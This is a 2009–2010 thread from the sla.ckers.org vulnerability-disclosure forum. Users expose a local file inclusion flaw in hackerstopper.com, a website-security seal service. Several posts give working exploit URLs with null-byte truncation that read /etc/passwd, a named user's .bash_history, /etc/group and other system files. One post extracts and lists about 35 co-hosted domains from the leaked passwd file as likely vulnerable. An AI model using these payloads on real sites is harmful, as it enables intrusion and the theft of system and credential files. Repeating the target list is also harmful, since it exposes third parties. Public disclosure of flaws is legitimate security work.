Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
LFI in hackerstopper.com with crash in firefox 3.5.5
Posted by: WHK
Date: November 10, 2009 08:38PM

http://hackerstopper.com/verified.php?name=verified

Options: ReplyQuote
Re: LFI in hackerstopper.com with crash in firefox 3.5.5
Posted by: sirdarckcat
Date: November 10, 2009 08:48PM

http://hackerstopper.com/verified.php?name=youdeparted
Quote

HackerStopper has tested YouDeparted for over 11,000 known vulnerabilities. Security professionals have verifed that YouDeparted is secure and have reviewed their identity theft protection policies and privacy procedures. After thorough testing by our automated scanning service and review by security professionals, HackerStopper has awarded YouDeparted the following seal of approval:

Complete Website Security Verification
HackerStopper has verified that YouDeparted is a completeley secure website.
Secured Nov-10

You can use YouDeparted with confidence because your personal information is safe on their website.

The YouDeparted HackerStopper Certification seals have been verified and are authentic. Visit www.HackerStopper.com for more details.

http://hackerstopper.com/verified.php?name=slackers =>
Quote

Warning:
include(slackers.php) [function.include]: failed to open stream: No such file or directory in /home/.other/nharris/hackerstopper.com/verified.php on line 13
haha
lol

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 11/10/2009 08:48PM by sirdarckcat.

Options: ReplyQuote
Re: LFI in hackerstopper.com with crash in firefox 3.5.5
Posted by: x1x1x
Date: April 21, 2010 08:29AM

/etc/passwd
http://hackerstopper.com/verified.php?name=/etc/passwd%00

/.bash_history
http://hackerstopper.com/verified.php?name=/home/nharris/.bash_history%00

Options: ReplyQuote
Re: LFI in hackerstopper.com with crash in firefox 3.5.5
Posted by: rsnake
Date: April 21, 2010 01:10PM

The following also are probably vulnerable as a result:

$ cat passwd.txt |cut -f 5 -d :|cut -f 1 -d " "|egrep "\."
media.livinghistorylibrary.org
thesciotovoice.com
theultranyc.com
chiquitonis.com
kingsdestiny.org
cooler.futurenotfound.com
fishkimissions.net
thepaperofwabash.com
musicvcds.com
mistressshah.com
pooparticles.com
hplife.org
visceralreactions.com
mindandmachine.net
seattlechat.net
cococreekjobs.com
lgbtqsafeschool.org
shittygamesclub.com
nicktahoe.com
seattlechat.net
kingspublishers.com
duhsign.com
cellfonts.com
nomad93.foosthole.net
nefariaz.foosthole.net
toktech.com
jc.21c.es
hackerstopper.com
sjfieldofdreams.org
rails.ctg4u.com
duhsign.com
pehealth.dreamhosters.com
movementss.com
boaz.dgtlmoon.com
living.foosthole.net

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: LFI in hackerstopper.com with crash in firefox 3.5.5
Posted by: Skyphire
Date: April 24, 2010 12:47PM

^x1x1x the passwd file & bash history looks like a honeypot to me.

Options: ReplyQuote
Re: LFI in hackerstopper.com with crash in firefox 3.5.5
Posted by: Skyphire
Date: April 24, 2010 01:25PM

On the other hand;

http://hackerstopper.com/verified.php?name=/etc/profile%00
http://hackerstopper.com/verified.php?name=/etc/group%00
http://hackerstopper.com/verified.php?name=/etc/localtime%00
http://hackerstopper.com/verified.php?name=/sys/power/state%00
http://hackerstopper.com/verified.php?name=/sbin/iptables%00

Looks legit.

Options: ReplyQuote


Sorry, only registered users may post in this forum.